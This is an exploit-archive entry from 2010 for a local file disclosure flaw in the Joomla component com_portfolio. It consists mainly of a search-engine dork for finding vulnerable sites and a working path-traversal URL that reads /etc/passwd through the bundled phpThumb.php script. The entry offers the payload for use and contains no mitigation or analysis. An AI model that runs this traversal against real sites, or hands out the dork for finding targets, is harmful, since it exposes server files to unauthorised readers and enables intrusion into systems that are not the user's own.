id: 11912
date: 04/21/2010
title: Joomla Component com_portfolio Local File Disclosure
author: Mr.tro0oqy
cves: 

====================================================
Joomla Component com_portfolio Local File Disclosure
====================================================

Joomla compnent com_portfolio Local File Disclosure
 
author : Mr.tro0oqy from comunity college :(
 
email : t.4@windowslive.com
 
greetz:alzomer , Mr.ksoory , R3d-D3vil from palstine ..
 
dork :inurl:index.php?option=com_portfolio
 
exp:
 
http://www.target.com/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd



#  0day.today [2023-03-25]  #